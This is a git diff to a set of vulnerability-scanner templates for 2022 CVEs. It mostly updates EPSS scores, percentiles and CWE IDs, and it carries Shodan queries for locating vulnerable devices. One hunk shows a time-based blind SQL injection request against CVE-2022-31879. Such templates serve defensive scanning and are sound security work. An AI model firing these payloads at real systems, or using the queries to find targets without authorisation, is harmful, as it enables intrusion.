0.97403 metadata: max-request: 3 framework: wordpress diff --git a/http/cves/2022/CVE-2022-28923.yaml b/http/cves/2022/CVE-2022-28923.yaml index 4e0a191f49..a7c036bc4b 100644 --- a/http/cves/2022/CVE-2022-28923.yaml +++ b/http/cves/2022/CVE-2022-28923.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-28923 cwe-id: CWE-601 - epss-score: 0.00819 + epss-score: 0.00696 cpe: cpe:2.3:a:caddyserver:caddy:2.4.6:*:*:*:*:*:*:* + epss-percentile: 0.7774 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-28955.yaml b/http/cves/2022/CVE-2022-28955.yaml index 52628cf6ac..cf5e704039 100644 --- a/http/cves/2022/CVE-2022-28955.yaml +++ b/http/cves/2022/CVE-2022-28955.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-28955 cwe-id: CWE-287 - epss-score: 0.02513 + epss-score: 0.02376 cpe: cpe:2.3:o:dlink:dir-816l_firmware:206b01:*:*:*:*:*:*:* + epss-percentile: 0.88455 metadata: max-request: 2 shodan-query: http.html:"DIR-816L" diff --git a/http/cves/2022/CVE-2022-29004.yaml b/http/cves/2022/CVE-2022-29004.yaml index b717ad7d4e..b884041188 100644 --- a/http/cves/2022/CVE-2022-29004.yaml +++ b/http/cves/2022/CVE-2022-29004.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00174 cpe: cpe:2.3:a:e-diary_management_system_project:e-diary_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.53866 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-29005.yaml b/http/cves/2022/CVE-2022-29005.yaml index 3e0136e954..19f1cf86da 100644 --- a/http/cves/2022/CVE-2022-29005.yaml +++ b/http/cves/2022/CVE-2022-29005.yaml @@ -18,13 +18,13 @@ info: cwe-id: CWE-79 epss-score: 0.00115 cpe: cpe:2.3:a:online_birth_certificate_system_project:online_birth_certificate_system:1.2:*:*:*:*:*:*:* + epss-percentile: 0.44553 metadata: max-request: 3 verified: true vendor: online_birth_certificate_system_project product: online_birth_certificate_system tags: cve,cve2022,xss,obcs,authenticated - variables: str: "{{rand_base(6)}}" diff --git a/http/cves/2022/CVE-2022-29006.yaml b/http/cves/2022/CVE-2022-29006.yaml index a981443782..967d0bb598 100644 --- a/http/cves/2022/CVE-2022-29006.yaml +++ b/http/cves/2022/CVE-2022-29006.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-89 epss-score: 0.20033 cpe: cpe:2.3:a:directory_management_system_project:directory_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.95679 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-29007.yaml b/http/cves/2022/CVE-2022-29007.yaml index 5314fc6b80..da79f1bf59 100644 --- a/http/cves/2022/CVE-2022-29007.yaml +++ b/http/cves/2022/CVE-2022-29007.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-89 epss-score: 0.20033 cpe: cpe:2.3:a:dairy_farm_shop_management_system_project:dairy_farm_shop_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.95679 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-29009.yaml b/http/cves/2022/CVE-2022-29009.yaml index c8f1cdc6b2..57ccb9de04 100644 --- a/http/cves/2022/CVE-2022-29009.yaml +++ b/http/cves/2022/CVE-2022-29009.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-89 epss-score: 0.20033 cpe: cpe:2.3:a:cyber_cafe_management_system_project:cyber_cafe_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.95679 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-29014.yaml b/http/cves/2022/CVE-2022-29014.yaml index b521113884..6d550743b3 100644 --- a/http/cves/2022/CVE-2022-29014.yaml +++ b/http/cves/2022/CVE-2022-29014.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2022-29014 epss-score: 0.79768 cpe: cpe:2.3:o:razer:sila_firmware:2.0.441_api-2.0.418:*:*:*:*:*:*:* + epss-percentile: 0.97868 metadata: max-request: 1 vendor: razer diff --git a/http/cves/2022/CVE-2022-29078.yaml b/http/cves/2022/CVE-2022-29078.yaml index 8b446a133e..308002ddb2 100644 --- a/http/cves/2022/CVE-2022-29078.yaml +++ b/http/cves/2022/CVE-2022-29078.yaml @@ -16,9 +16,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-29078 - cwe-id: CWE-74 - epss-score: 0.02303 + cwe-id: CWE-94 + epss-score: 0.02789 cpe: cpe:2.3:a:ejs:ejs:3.1.6:*:*:*:*:node.js:*:* + epss-percentile: 0.89291 metadata: max-request: 1 framework: node.js diff --git a/http/cves/2022/CVE-2022-29153.yaml b/http/cves/2022/CVE-2022-29153.yaml index 7c50ab329b..8081d4e08d 100644 --- a/http/cves/2022/CVE-2022-29153.yaml +++ b/http/cves/2022/CVE-2022-29153.yaml @@ -18,8 +18,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-29153 cwe-id: CWE-918 - epss-score: 0.01824 + epss-score: 0.01648 cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:-:*:*:* + epss-percentile: 0.85995 metadata: max-request: 2 shodan-query: title:"Consul by HashiCorp" diff --git a/http/cves/2022/CVE-2022-29272.yaml b/http/cves/2022/CVE-2022-29272.yaml index 546171cfb8..f9cebcb2f4 100644 --- a/http/cves/2022/CVE-2022-29272.yaml +++ b/http/cves/2022/CVE-2022-29272.yaml @@ -17,8 +17,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-29272 cwe-id: CWE-601 - epss-score: 0.00174 + epss-score: 0.00188 cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* + epss-percentile: 0.55474 metadata: max-request: 2 vendor: nagios diff --git a/http/cves/2022/CVE-2022-29298.yaml b/http/cves/2022/CVE-2022-29298.yaml index ca9992f843..ca570137dd 100644 --- a/http/cves/2022/CVE-2022-29298.yaml +++ b/http/cves/2022/CVE-2022-29298.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-29298 cwe-id: CWE-22 - epss-score: 0.08968 + epss-score: 0.13411 cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:* + epss-percentile: 0.94862 metadata: max-request: 1 shodan-query: http.html:"SolarView Compact" diff --git a/http/cves/2022/CVE-2022-29303.yaml b/http/cves/2022/CVE-2022-29303.yaml index a4a8a5f652..1485f60190 100644 --- a/http/cves/2022/CVE-2022-29303.yaml +++ b/http/cves/2022/CVE-2022-29303.yaml @@ -15,9 +15,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-29303 - cwe-id: CWE-77 - epss-score: 0.96014 + cwe-id: CWE-78 + epss-score: 0.9661 cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:* + epss-percentile: 0.99454 metadata: max-request: 1 shodan-query: http.html:"SolarView Compact" diff --git a/http/cves/2022/CVE-2022-29349.yaml b/http/cves/2022/CVE-2022-29349.yaml index 146c7339cf..86f22a4816 100644 --- a/http/cves/2022/CVE-2022-29349.yaml +++ b/http/cves/2022/CVE-2022-29349.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-29349 cwe-id: CWE-79 - epss-score: 0.02254 + epss-score: 0.01051 cpe: cpe:2.3:a:keking:kkfileview:4.0.0:*:*:*:*:*:*:* + epss-percentile: 0.82198 metadata: max-request: 1 shodan-query: http.html:"kkFileView" diff --git a/http/cves/2022/CVE-2022-29383.yaml b/http/cves/2022/CVE-2022-29383.yaml index 3ce2599a0e..f49b63d2c5 100644 --- a/http/cves/2022/CVE-2022-29383.yaml +++ b/http/cves/2022/CVE-2022-29383.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-29383 cwe-id: CWE-89 - epss-score: 0.5739 + epss-score: 0.56167 cpe: cpe:2.3:o:netgear:ssl312_firmware:fvs336gv2:*:*:*:*:*:*:* + epss-percentile: 0.97221 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-29455.yaml b/http/cves/2022/CVE-2022-29455.yaml index 7af0773c4f..328ad36bdb 100644 --- a/http/cves/2022/CVE-2022-29455.yaml +++ b/http/cves/2022/CVE-2022-29455.yaml @@ -17,8 +17,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-29455 cwe-id: CWE-79 - epss-score: 0.00165 + epss-score: 0.0018 cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.54527 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-29464.yaml b/http/cves/2022/CVE-2022-29464.yaml index 79894646f6..44d90e0ff8 100644 --- a/http/cves/2022/CVE-2022-29464.yaml +++ b/http/cves/2022/CVE-2022-29464.yaml @@ -16,9 +16,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-29464 - cwe-id: CWE-434 - epss-score: 0.97483 + cwe-id: CWE-22 + epss-score: 0.97451 cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* + epss-percentile: 0.99922 metadata: max-request: 2 shodan-query: http.favicon.hash:1398055326 diff --git a/http/cves/2022/CVE-2022-29548.yaml b/http/cves/2022/CVE-2022-29548.yaml index cc03320a54..90bce2d52b 100644 --- a/http/cves/2022/CVE-2022-29548.yaml +++ b/http/cves/2022/CVE-2022-29548.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00233 cpe: cpe:2.3:a:wso2:api_manager:2.2.0:*:*:*:*:*:*:* + epss-percentile: 0.60683 metadata: max-request: 1 google-query: inurl:"carbon/admin/login" diff --git a/http/cves/2022/CVE-2022-29775.yaml b/http/cves/2022/CVE-2022-29775.yaml index 0a6aa5c060..32d9fe231b 100644 --- a/http/cves/2022/CVE-2022-29775.yaml +++ b/http/cves/2022/CVE-2022-29775.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-29775 cwe-id: CWE-287 - epss-score: 0.01075 + epss-score: 0.0103 cpe: cpe:2.3:a:ispyconnect:ispy:7.2.2.0:*:*:*:*:*:*:* + epss-percentile: 0.82001 metadata: max-request: 1 shodan-query: http.html:"iSpy is running" diff --git a/http/cves/2022/CVE-2022-30073.yaml b/http/cves/2022/CVE-2022-30073.yaml index dc73cc65d6..81483d05e1 100644 --- a/http/cves/2022/CVE-2022-30073.yaml +++ b/http/cves/2022/CVE-2022-30073.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00159 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.2:*:*:*:*:*:*:* + epss-percentile: 0.51862 metadata: max-request: 4 verified: true diff --git a/http/cves/2022/CVE-2022-30489.yaml b/http/cves/2022/CVE-2022-30489.yaml index 83be2e5bd4..f95838cc41 100644 --- a/http/cves/2022/CVE-2022-30489.yaml +++ b/http/cves/2022/CVE-2022-30489.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00099 cpe: cpe:2.3:o:wavlink:wn535g3_firmware:-:*:*:*:*:*:*:* + epss-percentile: 0.40272 metadata: max-request: 1 shodan-query: http.title:"Wi-Fi APP Login" diff --git a/http/cves/2022/CVE-2022-30512.yaml b/http/cves/2022/CVE-2022-30512.yaml index d9428a1e26..90b756ac15 100644 --- a/http/cves/2022/CVE-2022-30512.yaml +++ b/http/cves/2022/CVE-2022-30512.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-30512 cwe-id: CWE-89 - epss-score: 0.01318 + epss-score: 0.0148 cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.85145 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-30513.yaml b/http/cves/2022/CVE-2022-30513.yaml index 66e23566af..790975341c 100644 --- a/http/cves/2022/CVE-2022-30513.yaml +++ b/http/cves/2022/CVE-2022-30513.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00109 cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.43104 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-30514.yaml b/http/cves/2022/CVE-2022-30514.yaml index bbdd5516d6..145fd05b12 100644 --- a/http/cves/2022/CVE-2022-30514.yaml +++ b/http/cves/2022/CVE-2022-30514.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00109 cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.43104 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-30525.yaml b/http/cves/2022/CVE-2022-30525.yaml index 32810de037..17dc34c9e3 100644 --- a/http/cves/2022/CVE-2022-30525.yaml +++ b/http/cves/2022/CVE-2022-30525.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-30525 cwe-id: CWE-78 - epss-score: 0.97548 + epss-score: 0.97528 cpe: cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.99982 metadata: max-request: 1 shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700" diff --git a/http/cves/2022/CVE-2022-3062.yaml b/http/cves/2022/CVE-2022-3062.yaml index 1b2a7b5784..2bfc55f686 100644 --- a/http/cves/2022/CVE-2022-3062.yaml +++ b/http/cves/2022/CVE-2022-3062.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-3062 cwe-id: CWE-79 - epss-score: 0.00071 + epss-score: 0.00078 cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.32485 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-30776.yaml b/http/cves/2022/CVE-2022-30776.yaml index 83ff868dc5..73de78d8bf 100644 --- a/http/cves/2022/CVE-2022-30776.yaml +++ b/http/cves/2022/CVE-2022-30776.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.0011 cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:* + epss-percentile: 0.43436 metadata: max-request: 1 shodan-query: http.html:"atmail" diff --git a/http/cves/2022/CVE-2022-30777.yaml b/http/cves/2022/CVE-2022-30777.yaml index a780863a5d..6f4f1cb32f 100644 --- a/http/cves/2022/CVE-2022-30777.yaml +++ b/http/cves/2022/CVE-2022-30777.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00109 cpe: cpe:2.3:a:parallels:h-sphere:3.6.2:*:*:*:*:*:*:* + epss-percentile: 0.43104 metadata: max-request: 2 shodan-query: title:"h-sphere" diff --git a/http/cves/2022/CVE-2022-31126.yaml b/http/cves/2022/CVE-2022-31126.yaml index 83d6746579..54c1ac8ba2 100644 --- a/http/cves/2022/CVE-2022-31126.yaml +++ b/http/cves/2022/CVE-2022-31126.yaml @@ -18,8 +18,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31126 cwe-id: CWE-74 - epss-score: 0.78469 + epss-score: 0.82236 cpe: cpe:2.3:a:roxy-wi:roxy-wi:*:*:*:*:*:*:*:* + epss-percentile: 0.9795 metadata: max-request: 1 shodan-query: http.html:"Roxy-WI" diff --git a/http/cves/2022/CVE-2022-31268.yaml b/http/cves/2022/CVE-2022-31268.yaml index 6dbb0ed590..89c87a0990 100644 --- a/http/cves/2022/CVE-2022-31268.yaml +++ b/http/cves/2022/CVE-2022-31268.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-31268 cwe-id: CWE-22 - epss-score: 0.0037 + epss-score: 0.00582 cpe: cpe:2.3:a:gitblit:gitblit:1.9.3:*:*:*:*:*:*:* + epss-percentile: 0.75319 metadata: max-request: 1 shodan-query: http.html:"Gitblit" diff --git a/http/cves/2022/CVE-2022-31269.yaml b/http/cves/2022/CVE-2022-31269.yaml index d833c89f31..78642cffa4 100644 --- a/http/cves/2022/CVE-2022-31269.yaml +++ b/http/cves/2022/CVE-2022-31269.yaml @@ -16,8 +16,9 @@ info: cvss-score: 8.2 cve-id: CVE-2022-31269 cwe-id: CWE-798 - epss-score: 0.00357 + epss-score: 0.00302 cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.65738 metadata: max-request: 1 shodan-query: http.title:"Linear eMerge" diff --git a/http/cves/2022/CVE-2022-31299.yaml b/http/cves/2022/CVE-2022-31299.yaml index b5a5ed0fa8..1d0ed09dc6 100644 --- a/http/cves/2022/CVE-2022-31299.yaml +++ b/http/cves/2022/CVE-2022-31299.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-31299 cwe-id: CWE-79 - epss-score: 0.00153 + epss-score: 0.00167 cpe: cpe:2.3:a:angtech:haraj:3.7:*:*:*:*:*:*:* + epss-percentile: 0.52759 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-31373.yaml b/http/cves/2022/CVE-2022-31373.yaml index 1317514bd3..f52420ed19 100644 --- a/http/cves/2022/CVE-2022-31373.yaml +++ b/http/cves/2022/CVE-2022-31373.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-31373 cwe-id: CWE-79 - epss-score: 0.001 + epss-score: 0.00099 cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.0:*:*:*:*:*:*:* + epss-percentile: 0.40272 metadata: max-request: 1 shodan-query: http.html:"SolarView Compact" diff --git a/http/cves/2022/CVE-2022-31474.yaml b/http/cves/2022/CVE-2022-31474.yaml index a70a2231d5..aeafcf1d9e 100644 --- a/http/cves/2022/CVE-2022-31474.yaml +++ b/http/cves/2022/CVE-2022-31474.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-31474 cwe-id: CWE-22 - epss-score: 0.00393 + epss-score: 0.01583 cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.85716 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2022/CVE-2022-31499.yaml b/http/cves/2022/CVE-2022-31499.yaml index ebdd6bd3f2..eb5dc9dc4f 100644 --- a/http/cves/2022/CVE-2022-31499.yaml +++ b/http/cves/2022/CVE-2022-31499.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31499 cwe-id: CWE-78 - epss-score: 0.03957 + epss-score: 0.17666 cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.95449 metadata: max-request: 1 shodan-query: title:"eMerge" diff --git a/http/cves/2022/CVE-2022-31656.yaml b/http/cves/2022/CVE-2022-31656.yaml index d22584c4ae..7f2d3969e3 100644 --- a/http/cves/2022/CVE-2022-31656.yaml +++ b/http/cves/2022/CVE-2022-31656.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31656 cwe-id: CWE-287 - epss-score: 0.91417 + epss-score: 0.92696 cpe: cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:* + epss-percentile: 0.98631 metadata: max-request: 1 shodan-query: http.favicon.hash:-1250474341 diff --git a/http/cves/2022/CVE-2022-31798.yaml b/http/cves/2022/CVE-2022-31798.yaml index 70877e7a0c..40644ba056 100644 --- a/http/cves/2022/CVE-2022-31798.yaml +++ b/http/cves/2022/CVE-2022-31798.yaml @@ -16,9 +16,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-31798 - cwe-id: CWE-79 - epss-score: 0.00109 + cwe-id: CWE-384 + epss-score: 0.00148 cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.50097 metadata: max-request: 1 shodan-query: http.title:"eMerge" diff --git a/http/cves/2022/CVE-2022-31814.yaml b/http/cves/2022/CVE-2022-31814.yaml index c1808a51d0..e914c107db 100644 --- a/http/cves/2022/CVE-2022-31814.yaml +++ b/http/cves/2022/CVE-2022-31814.yaml @@ -16,8 +16,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-31814 - epss-score: 0.96754 + cwe-id: CWE-78 + epss-score: 0.96743 cpe: cpe:2.3:a:netgate:pfblockerng:*:*:*:*:*:pfsense:*:* + epss-percentile: 0.99511 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-31845.yaml b/http/cves/2022/CVE-2022-31845.yaml index e9bb37c2e4..4d56a42a8e 100644 --- a/http/cves/2022/CVE-2022-31845.yaml +++ b/http/cves/2022/CVE-2022-31845.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-31845 cwe-id: CWE-668 - epss-score: 0.00982 + epss-score: 0.00789 cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:* + epss-percentile: 0.79334 metadata: max-request: 1 shodan-query: http.html:"Wavlink" diff --git a/http/cves/2022/CVE-2022-31846.yaml b/http/cves/2022/CVE-2022-31846.yaml index 70a17b9565..75d575667f 100644 --- a/http/cves/2022/CVE-2022-31846.yaml +++ b/http/cves/2022/CVE-2022-31846.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-31846 cwe-id: CWE-668 - epss-score: 0.00982 + epss-score: 0.00789 cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:* + epss-percentile: 0.79334 metadata: max-request: 1 shodan-query: http.html:"Wavlink" diff --git a/http/cves/2022/CVE-2022-31847.yaml b/http/cves/2022/CVE-2022-31847.yaml index 9936c27ce0..440f11315a 100644 --- a/http/cves/2022/CVE-2022-31847.yaml +++ b/http/cves/2022/CVE-2022-31847.yaml @@ -13,9 +13,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-31847 - cwe-id: CWE-668 - epss-score: 0.0072 + cwe-id: CWE-425 + epss-score: 0.00794 cpe: cpe:2.3:o:wavlink:wn579x3_firmware:m79x3.v5030.180719:*:*:*:*:*:*:* + epss-percentile: 0.79405 metadata: max-request: 1 shodan-query: http.html:"Wavlink" diff --git a/http/cves/2022/CVE-2022-31854.yaml b/http/cves/2022/CVE-2022-31854.yaml index 18836abee4..6b4f32d5b0 100644 --- a/http/cves/2022/CVE-2022-31854.yaml +++ b/http/cves/2022/CVE-2022-31854.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31854 cwe-id: CWE-434 - epss-score: 0.05293 + epss-score: 0.062 cpe: cpe:2.3:a:codologic:codoforum:5.1:*:*:*:*:*:*:* + epss-percentile: 0.92636 metadata: max-request: 4 verified: true diff --git a/http/cves/2022/CVE-2022-31879.yaml b/http/cves/2022/CVE-2022-31879.yaml index 6d1a98f804..260d2f93d6 100644 --- a/http/cves/2022/CVE-2022-31879.yaml +++ b/http/cves/2022/CVE-2022-31879.yaml @@ -15,8 +15,9 @@ info: cvss-score: 8.8 cve-id: CVE-2022-31879 cwe-id: CWE-89 - epss-score: 0.04694 + epss-score: 0.0501 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.9185 metadata: max-request: 2 verified: true @@ -30,7 +31,6 @@ http: @timeout: 15s GET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(0)))dPPt)+AND+'rogN'='rogN HTTP/1.1 Host: {{Hostname}} - - | @timeout: 15s GET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(10)))dPPt)+AND+'rogN'='rogN HTTP/1.1 diff --git a/http/cves/2022/CVE-2022-31974.yaml b/http/cves/2022/CVE-2022-31974.yaml index 0785efd06c..6e076ea57e 100644 --- a/http/cves/2022/CVE-2022-31974.yaml +++ b/http/cves/2022/CVE-2022-31974.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31974 cwe-id: CWE-89 - epss-score: 0.00549 + epss-score: 0.00618 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.76135 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2022/CVE-2022-31975.yaml b/http/cves/2022/CVE-2022-31975.yaml index 4fd8f7faab..4671f4a723 100644 --- a/http/cves/2022/CVE-2022-31975.yaml +++ b/http/cves/2022/CVE-2022-31975.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31975 cwe-id: CWE-89 - epss-score: 0.00549 + epss-score: 0.00618 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.76135 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2022/CVE-2022-31976.yaml b/http/cves/2022/CVE-2022-31976.yaml index 047a1af5ae..e473589f1d 100644 --- a/http/cves/2022/CVE-2022-31976.yaml +++ b/http/cves/2022/CVE-2022-31976.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31976 cwe-id: CWE-89 - epss-score: 0.01119 + epss-score: 0.01144 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.82961 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2022/CVE-2022-31977.yaml b/http/cves/2022/CVE-2022-31977.yaml index 4313bcf268..1335eb969f 100644 --- a/http/cves/2022/CVE-2022-31977.yaml +++ b/http/cves/2022/CVE-2022-31977.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31977 cwe-id: CWE-89 - epss-score: 0.01119 + epss-score: 0.01144 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.82961 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2022/CVE-2022-31978.yaml b/http/cves/2022/CVE-2022-31978.yaml index 4f562b434c..b6df63d585 100644 --- a/http/cves/2022/CVE-2022-31978.yaml +++ b/http/cves/2022/CVE-2022-31978.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31978 cwe-id: CWE-89 - epss-score: 0.01119 + epss-score: 0.01144 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.82961 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2022/CVE-2022-31980.yaml b/http/cves/2022/CVE-2022-31980.yaml index 2cb753f92e..8fb6c344a4 100644 --- a/http/cves/2022/CVE-2022-31980.yaml +++ b/http/cves/2022/CVE-2022-31980.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31980 cwe-id: CWE-89 - epss-score: 0.00549 + epss-score: 0.00618 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.76135 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2022/CVE-2022-31981.yaml b/http/cves/2022/CVE-2022-31981.yaml index 06ca4cea40..940132f8eb 100644 --- a/http/cves/2022/CVE-2022-31981.yaml +++ b/http/cves/2022/CVE-2022-31981.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31981 cwe-id: CWE-89 - epss-score: 0.00549 + epss-score: 0.00618 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.76135 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2022/CVE-2022-31982.yaml b/http/cves/2022/CVE-2022-31982.yaml index 99f4140920..1e4310b2f2 100644 --- a/http/cves/2022/CVE-2022-31982.yaml +++ b/http/cves/2022/CVE-2022-31982.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31982 cwe-id: CWE-89 - epss-score: 0.00549 + epss-score: 0.00618 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.76135 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2022/CVE-2022-31983.yaml b/http/cves/2022/CVE-2022-31983.yaml index c9aa6077f7..68420a085d 100644 --- a/http/cves/2022/CVE-2022-31983.yaml +++ b/http/cves/2022/CVE-2022-31983.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31983 cwe-id: CWE-89 - epss-score: 0.00549 + epss-score: 0.00618 cpe: 